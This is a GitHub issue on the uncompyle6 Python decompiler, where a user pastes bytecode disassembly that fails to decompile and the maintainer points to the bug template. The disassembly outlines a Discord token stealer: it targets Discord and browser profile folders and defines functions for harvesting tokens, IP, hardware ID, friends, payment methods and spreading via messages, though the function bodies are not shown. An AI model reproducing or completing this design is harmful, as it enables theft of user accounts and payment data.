### ISSUE TITLE
Parse error at or near `<121>' instruction at offset 334_336

### ISSUE THREAD

**Issue by Diasky** [rocky/python-uncompyle6#341]
L.   1         0  LOAD_CONST               0
                2  LOAD_CONST               None
                4  IMPORT_NAME              os
                6  STORE_NAME               os

 L.   2         8  LOAD_NAME                os
               10  LOAD_ATTR                name
               12  LOAD_STR                 'nt'
               14  COMPARE_OP               !=
               16  POP_JUMP_IF_FALSE    24  'to 24'

 L.   3        18  LOAD_NAME                exit
               20  CALL_FUNCTION_0       0  ''
               22  POP_TOP
             24_0  COME_FROM            16  '16'

 L.   4        24  LOAD_CONST               0
               26  LOAD_CONST               ('findall',)
               28  IMPORT_NAME              re
               30  IMPORT_FROM              findall
               32  STORE_NAME               findall
               34  POP_TOP

 L.   5        36  LOAD_CONST               0
               38  LOAD_CONST               ('loads', 'dumps')
               40  IMPORT_NAME              json
               42  IMPORT_FROM              loads
               44  STORE_NAME               loads
               46  IMPORT_FROM              dumps
               48  STORE_NAME               dumps
               50  POP_TOP

 L.   6        52  LOAD_CONST               0
               54  LOAD_CONST               ('b64decode',)
               56  IMPORT_NAME              base64
               58  IMPORT_FROM              b64decode
               60  STORE_NAME               b64decode
               62  POP_TOP

 L.   7        64  LOAD_CONST               0
               66  LOAD_CONST               ('Popen', 'PIPE')
               68  IMPORT_NAME              subprocess
               70  IMPORT_FROM              Popen
               72  STORE_NAME               Popen
               74  IMPORT_FROM              PIPE
               76  STORE_NAME               PIPE
               78  POP_TOP

 L.   8        80  LOAD_CONST               0
               82  LOAD_CONST               ('Request', 'urlopen')
               84  IMPORT_NAME_ATTR         urllib.request
               86  IMPORT_FROM              Request
               88  STORE_NAME               Request
               90  IMPORT_FROM              urlopen
               92  STORE_NAME               urlopen
               94  POP_TOP

 L.   9        96  LOAD_CONST               0
               98  LOAD_CONST               ('datetime',)
              100  IMPORT_NAME              datetime
              102  IMPORT_FROM              datetime
              104  STORE_NAME               datetime
              106  POP_TOP

 L.  10       108  LOAD_CONST               0
              110  LOAD_CONST               ('Thread',)
              112  IMPORT_NAME              threading
              114  IMPORT_FROM              Thread
              116  STORE_NAME               Thread
              118  POP_TOP

 L.  11       120  LOAD_CONST               0
              122  LOAD_CONST               ('sleep',)
              124  IMPORT_NAME              time
              126  IMPORT_FROM              sleep
              128  STORE_NAME               sleep
              130  POP_TOP

 L.  12       132  LOAD_CONST               0
              134  LOAD_CONST               ('argv',)
              136  IMPORT_NAME              sys
              138  IMPORT_FROM              argv
              140  STORE_NAME               argv
              142  POP_TOP

 L.  13       144  LOAD_NAME                os
              146  LOAD_METHOD              getenv
              148  LOAD_STR                 'LOCALAPPDATA'
              150  CALL_METHOD_1         1  ''
              152  STORE_NAME               LOCAL

 L.  14       154  LOAD_NAME                os
              156  LOAD_METHOD              getenv
              158  LOAD_STR                 'APPDATA'
              160  CALL_METHOD_1         1  ''
              162  STORE_NAME               ROAMING

 L.  16       164  LOAD_NAME                ROAMING
              166  LOAD_STR                 '\\Discord'
              168  BINARY_ADD

 L.  17       170  LOAD_NAME                ROAMING
              172  LOAD_STR                 '\\discordcanary'
              174  BINARY_ADD

 L.  18       176  LOAD_NAME                ROAMING
              178  LOAD_STR                 '\\discordptb'
              180  BINARY_ADD

 L.  19       182  LOAD_NAME                LOCAL
              184  LOAD_STR                 '\\Google\\Chrome\\User Data\\Default'
              186  BINARY_ADD

 L.  20       188  LOAD_NAME                ROAMING
              190  LOAD_STR                 '\\Opera Software\\Opera Stable'
              192  BINARY_ADD

 L.  21       194  LOAD_NAME                LOCAL
              196  LOAD_STR                 '\\BraveSoftware\\Brave-Browser\\User Data\\Default'
              198  BINARY_ADD

 L.  22       200  LOAD_NAME                LOCAL
              202  LOAD_STR                 '\\Yandex\\YandexBrowser\\User Data\\Default'
              204  BINARY_ADD

 L.  15       206  LOAD_CONST               ('Discord', 'Discord Canary', 'Discord PTB', 'Google Chrome', 'Opera', 'Brave', 'Yandex')
              208  BUILD_CONST_KEY_MAP_7     7
              210  STORE_NAME               PATHS

 L.  24       212  LOAD_CONST               (None, 'application/json')
              214  LOAD_CODE                <code_object getheaders>
              216  LOAD_STR                 'getheaders'
              218  MAKE_FUNCTION_1          'default'
              220  STORE_NAME               getheaders

 L.  32       222  LOAD_CODE                <code_object getuserdata>
              224  LOAD_STR                 'getuserdata'
              226  MAKE_FUNCTION_0          'Neither defaults, keyword-only args, annotations, nor closures'
              228  STORE_NAME               getuserdata

 L.  37       230  LOAD_CODE                <code_object gettokens>
              232  LOAD_STR                 'gettokens'
              234  MAKE_FUNCTION_0          'Neither defaults, keyword-only args, annotations, nor closures'
              236  STORE_NAME               gettokens

 L.  48       238  LOAD_CODE                <code_object getdeveloper>
              240  LOAD_STR                 'getdeveloper'
              242  MAKE_FUNCTION_0          'Neither defaults, keyword-only args, annotations, nor closures'
              244  STORE_NAME               getdeveloper

 L.  55       246  LOAD_CODE                <code_object getip>
              248  LOAD_STR                 'getip'
              250  MAKE_FUNCTION_0          'Neither defaults, keyword-only args, annotations, nor closures'
              252  STORE_NAME               getip

 L.  62       254  LOAD_CODE                <code_object getavatar>
              256  LOAD_STR                 'getavatar'
              258  MAKE_FUNCTION_0          'Neither defaults, keyword-only args, annotations, nor closures'
              260  STORE_NAME               getavatar

 L.  69       262  LOAD_CODE                <code_object gethwid>
              264  LOAD_STR                 'gethwid'
              266  MAKE_FUNCTION_0          'Neither defaults, keyword-only args, annotations, nor closures'
              268  STORE_NAME               gethwid

 L.  72       270  LOAD_CODE                <code_object getfriends>
              272  LOAD_STR                 'getfriends'
              274  MAKE_FUNCTION_0          'Neither defaults, keyword-only args, annotations, nor closures'
              276  STORE_NAME               getfriends

 L.  77       278  LOAD_CODE                <code_object getchat>
              280  LOAD_STR                 'getchat'
              282  MAKE_FUNCTION_0          'Neither defaults, keyword-only args, annotations, nor closures'
              284  STORE_NAME               getchat

 L.  82       286  LOAD_CODE                <code_object has_payment_methods>
              288  LOAD_STR                 'has_payment_methods'
              290  MAKE_FUNCTION_0          'Neither defaults, keyword-only args, annotations, nor closures'
              292  STORE_NAME               has_payment_methods

 L.  87       294  LOAD_CODE                <code_object send_message>
              296  LOAD_STR                 'send_message'
              298  MAKE_FUNCTION_0          'Neither defaults, keyword-only args, annotations, nor closures'
              300  STORE_NAME               send_message

 L.  92       302  LOAD_CODE                <code_object spread>
              304  LOAD_STR                 'spread'
              306  MAKE_FUNCTION_0          'Neither defaults, keyword-only args, annotations, nor closures'
              308  STORE_NAME               spread

 L. 101       310  LOAD_CODE                <code_object main>
              312  LOAD_STR                 'main'
              314  MAKE_FUNCTION_0          'Neither defaults, keyword-only args, annotations, nor closures'
              316  STORE_NAME               main

 L. 193       318  SETUP_FINALLY       330  'to 330'

 L. 194       320  LOAD_NAME                main
              322  CALL_FUNCTION_0       0  ''
              324  POP_TOP
              326  POP_BLOCK
              328  JUMP_FORWARD        376  'to 376'
            330_0  COME_FROM_FINALLY   318  '318'

 L. 195       330  DUP_TOP
              332  LOAD_NAME                Exception
          334_336  <121>               374  ''
              338  POP_TOP
              340  STORE_NAME               e
              342  POP_TOP
              344  SETUP_FINALLY       366  'to 366'

 L. 196       346  LOAD_NAME                print
              348  LOAD_NAME                e
              350  CALL_FUNCTION_1       1  ''
              352  POP_TOP

 L. 197       354  POP_BLOCK
              356  POP_EXCEPT
              358  LOAD_CONST               None
              360  STORE_NAME               e
              362  DELETE_NAME              e
              364  JUMP_FORWARD        376  'to 376'
            366_0  COME_FROM_FINALLY   344  '344'
              366  LOAD_CONST               None
              368  STORE_NAME               e
              370  DELETE_NAME              e
              372  <48>
              374  <48>
            376_0  COME_FROM           364  '364'
            376_1  COME_FROM           328  '328'

Parse error at or near `<121>' instruction at offset 334_336

**Comment by rocky** [comment]
Read and follow the instructions that were given https://github.com/rocky/python-uncompyle6/issues/new?assignees=&labels=&template=bug-report.md
